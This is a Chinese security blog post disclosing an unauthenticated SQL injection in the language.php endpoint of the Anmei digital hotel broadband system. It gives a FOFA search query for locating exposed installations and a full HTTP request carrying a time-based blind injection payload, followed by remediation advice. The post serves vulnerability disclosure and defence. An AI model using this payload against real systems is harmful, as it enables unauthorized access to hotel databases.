安美数字酒店宽带运营系统存在SQL注入漏洞

发布于:2025-04-04 ⋅ 阅读:(46) ⋅ 点赞:(0)

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

安美数字酒店宽带运营系统的language.php接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,未经身份认证地访问数据库,从而获取敏感信息或控制服务器

漏洞再现

FOFA:  title="酒店宽带运营系统"

在https://ip/manager/login.php页面抓包,再修改请求包(延时5s)

POST /language.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

EditStatus=1&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

修复建议 

1.参数化查询:使用参数化查询或预编译语句来避免SQL注入。

2.输入验证:对用户输入进行严格的验证和过滤,防止恶意数据注入。

3.最小权限原则:限制数据库用户的权限,仅授予必要的操作权限。

 

 


网站公告

今日签到

点亮在社区的每一天
去签到